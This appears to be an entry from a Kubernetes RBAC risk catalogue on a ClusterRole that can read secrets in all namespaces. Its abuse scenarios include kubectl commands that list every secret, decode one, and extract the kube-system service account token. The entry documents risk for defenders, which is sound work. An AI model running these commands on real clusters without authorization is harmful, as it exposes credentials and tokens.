Read secrets cluster-wide
Information Disclosure
Critical
Overview
| Field | Value |
|---|---|
| ID | 1010 |
| Name | Read secrets cluster-wide |
| Risk Category | Information Disclosure |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | core |
| Resources | secrets |
| Verbs | get, list, watch |
| Tags | ClusterWideSecretAccess CredentialAccess DataExposure InformationDisclosure |
Description
Grants access to read all secrets across all namespaces in the cluster. This is extremely critical as secrets often contain sensitive credentials, API keys, tokens, and other confidential data, leading to widespread data exposure and potential full cluster compromise.
Abuse Scenarios
- List all secrets across all namespaces.
kubectl get secrets --all-namespaces
- Retrieve and decode a specific secret’s data.
kubectl get secret <secret-name> -n <namespace> -o jsonpath='{.data.<key>}' | base64 -d
# Example: Get the default service account token
# kubectl get secret $(kubectl get sa default -n kube-system -o jsonpath='{.secrets[0].name}') -n kube-system -o jsonpath='{.data.token}' | base64 -d